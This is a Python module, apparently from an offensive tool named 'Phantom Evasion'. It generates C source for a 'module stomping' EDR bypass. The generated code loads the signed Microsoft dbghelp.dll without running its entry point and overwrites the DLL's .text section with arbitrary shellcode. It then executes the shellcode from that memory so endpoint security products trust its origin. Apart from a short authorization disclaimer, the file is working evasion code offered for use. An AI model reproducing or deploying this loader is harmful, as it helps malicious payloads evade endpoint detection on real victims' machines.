"""
Phantom Evasion - Module Stomping EDR Bypass

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_module_stomping() -> Dict[str, Any]:
    """Generate C code for the module-stomping technique.

    Technique overview:
        1. Load a sacrificial, signed Microsoft DLL (``dbghelp.dll``) using
           ``LoadLibraryExA`` with ``DONT_RESOLVE_DLL_REFERENCES`` so it maps
           into the process without executing its entry point.
        2. Locate the DLL's ``.text`` section via the PE header.
        3. Temporarily mark the section as writable
           (``VirtualProtect → PAGE_EXECUTE_READWRITE``).
        4. Overwrite the ``.text`` section with the shellcode.
        5. Restore the original page protection.
        6. Jump to the start of the overwritten section.

    Because the shellcode now resides within a signed, legitimate DLL's
    mapped memory region, many EDR/XDR solutions that perform address-space
    whitelisting based on the backing image will not flag the execution.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
// Module Stomping – generated by Phantom Evasion
// Layer 2 – EDR Bypass
// Overwrites the .text section of a loaded signed DLL with shellcode,
// making the payload appear to originate from a legitimate Microsoft module.

#include <windows.h>
#include <stdio.h>

/**
 * Find the virtual address and size of the named PE section in a loaded module.
 *
 * @param base         Base address of the loaded module.
 * @param section_name Section name (e.g. ".text"), up to 8 chars.
 * @param out_size     Receives the section's virtual size.
 * @return Pointer to the start of the section, or NULL on failure.
 */
static LPVOID find_section(HMODULE base, const char *section_name,
                            DWORD *out_size) {
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)base;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((BYTE *)base + dos->e_lfanew);
    PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);

    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) {
        if (strncmp((char *)sec->Name, section_name, 8) == 0) {
            if (out_size) *out_size = sec->Misc.VirtualSize;
            return (LPVOID)((BYTE *)base + sec->VirtualAddress);
        }
    }
    return NULL;
}

/**
 * Perform module stomping: load a sacrificial DLL, overwrite its .text
 * section with shellcode, then execute from within the DLL's address space.
 *
 * @param shellcode     Raw shellcode bytes.
 * @param shellcode_len Length of shellcode in bytes.
 * @return TRUE on success, FALSE on failure.
 */
static BOOL module_stomp(unsigned char *shellcode, size_t shellcode_len) {
    // Load the sacrificial DLL without resolving imports or running DllMain
    HMODULE hDll = LoadLibraryExA("dbghelp.dll",
                                   NULL,
                                   DONT_RESOLVE_DLL_REFERENCES);
    if (!hDll) return FALSE;

    DWORD section_size = 0;
    LPVOID text_addr = find_section(hDll, ".text", &section_size);
    if (!text_addr || section_size < shellcode_len) {
        FreeLibrary(hDll);
        return FALSE;
    }

    // Make the .text section writable
    DWORD old_protect = 0;
    if (!VirtualProtect(text_addr, shellcode_len,
                        PAGE_EXECUTE_READWRITE, &old_protect)) {
        FreeLibrary(hDll);
        return FALSE;
    }

    // Overwrite .text with shellcode
    memcpy(text_addr, shellcode, shellcode_len);

    // Restore original page protection (typically PAGE_EXECUTE_READ)
    DWORD dummy = 0;
    VirtualProtect(text_addr, shellcode_len, old_protect, &dummy);

    // Flush the instruction cache before executing
    FlushInstructionCache(GetCurrentProcess(), text_addr, shellcode_len);

    // Execute shellcode from within the DLL's legitimate memory range
    ((void(*)())text_addr)();

    // FreeLibrary not called intentionally – shellcode may still be running.
    return TRUE;
}
"""

    return {
        "code": code,
        "description": (
            "Module stomping: load signed DLL (dbghelp.dll), overwrite its "
            ".text section with shellcode, execute from legitimate module memory"
        ),
        "layer": "Layer 2 - EDR Bypass",
        "name": "module_stomping",
    }
